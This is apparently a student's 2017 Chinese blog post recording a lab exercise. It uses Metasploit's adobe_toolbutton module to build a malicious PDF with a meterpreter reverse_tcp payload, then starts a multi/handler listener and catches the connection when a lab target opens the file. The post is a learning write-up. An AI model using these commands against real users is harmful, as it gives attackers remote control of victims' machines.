• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录

20145208蔡野

  • 博客园
  • 联系
  • 订阅
  • 管理

公告

View Post

对客户端攻击:adobe_toolbutton

对客户端攻击:adobe_toolbutton

漏洞简介

  • 远程攻击者可以利用漏洞执行任意指令。当用户打开特定pdf就可以触发payload。

实践过程

  • 输入命令use exploit/windows/fileformat/adobe_toolbutton使用该模块,然后使用set payload windows/meterpreter/reverse_tcp设置回连,show options检查设置信息并补全,最后exploit生成文件,文件在显示的目录下:

  • 建立监听use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,然后exploit开启监听,同时在靶机点开pdf:

  • 可以看到回连成功

posted on 2017-04-12 17:54  20145208蔡野  阅读(224)  评论(0)    收藏  举报

刷新页面返回顶部
 
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3